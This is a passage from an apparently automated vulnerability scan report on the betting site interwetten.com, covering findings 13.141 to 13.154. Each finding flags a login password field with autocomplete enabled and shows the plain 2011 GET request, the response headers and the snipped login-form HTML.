13.141. https://www.interwetten.com/en/casino/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/casino/default.aspx

Issue detail

The page contains a form with the following action URL: /en/casino/default.aspx
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/casino/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:04 GMT
Content-Length: 355910
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<!-- ClickTale end of Top part -->

<form method="post" action="/en/casino/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.142. https://www.interwetten.com/en/cycling-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/cycling-betting

Issue detail

The page contains a form with the following action URL: /en/cycling-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/cycling-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:41 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:40 GMT
Connection: close
Content-Length: 223291
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/cycling-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.143. https://www.interwetten.com/en/darts-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/darts-betting

Issue detail

The page contains a form with the following action URL: /en/darts-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/darts-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:12 GMT
Connection: close
Content-Length: 224110
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/darts-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.144. https://www.interwetten.com/en/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/default.aspx

Issue detail

The page contains a form with the following action URL: default.aspx?home=1
The form contains the following password field with autocomplete enabled: wucHeader$ucLogin$txtPassword

Request

GET /en/default.aspx?home=1 HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:39:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:39:59 GMT
Content-Length: 34108
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<hea
...[SNIP]...
<!-- ClickTale end of Top part -->
   <form method="post" action="default.aspx?home=1" id="form">
<div class="aspNetHidden">
...[SNIP]...
<input name="wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.145. https://www.interwetten.com/en/football-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/football-betting

Issue detail

The page contains a form with the following action URL: /en/football-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/football-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:13 GMT
Connection: close
Content-Length: 261103
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/football-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.146. https://www.interwetten.com/en/games/default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/games/default.aspx

Issue detail

The page contains a form with the following action URL: /en/games/default.aspx
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/games/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 58330
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
...[SNIP]...
<!-- ClickTale end of Top part -->

<form method="post" action="/en/games/default.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.147. https://www.interwetten.com/en/golf-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/golf-betting

Issue detail

The page contains a form with the following action URL: /en/golf-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/golf-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223229
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/golf-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.148. https://www.interwetten.com/en/handball-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/handball-betting

Issue detail

The page contains a form with the following action URL: /en/handball-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/handball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:21 GMT
Connection: close
Content-Length: 226608
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/handball-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.149. https://www.interwetten.com/en/ice-hockey-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/ice-hockey-betting

Issue detail

The page contains a form with the following action URL: /en/ice-hockey-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/ice-hockey-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 225740
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/ice-hockey-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.150. https://www.interwetten.com/en/livebets

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/livebets

Issue detail

The page contains a form with the following action URL: /en/livebets
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/livebets HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:07 GMT
Connection: close
Content-Length: 222401
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/livebets" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.151. https://www.interwetten.com/en/motorbikes-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/motorbikes-betting

Issue detail

The page contains a form with the following action URL: /en/motorbikes-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/motorbikes-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:02 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:01 GMT
Connection: close
Content-Length: 224123
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/motorbikes-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.152. https://www.interwetten.com/en/online-skillgames

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/online-skillgames

Issue detail

The page contains a form with the following action URL: /en/online-skillgames
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/online-skillgames HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
<!-- ClickTale end of Top part -->

<form method="post" action="/en/online-skillgames" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.153. https://www.interwetten.com/en/politics-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/politics-betting

Issue detail

The page contains a form with the following action URL: /en/politics-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/politics-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 221965
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/politics-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,&#39;txtPassword&#39;);" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode(&quot;__doPostBack(&#39;ctl00$wucHeader$ucLogin$btnLogin&#39;,&#39;&#39;)&quot;, event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.154. https://www.interwetten.com/en/rugby-betting

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/rugby-betting

Issue detail

The page contains a form with the following action URL: /en/rugby-betting
The form contains the following password field with autocomplete enabled: ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/rugby-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:31 GMT
Connection: close
Content-Length: 225818
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/rugby-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
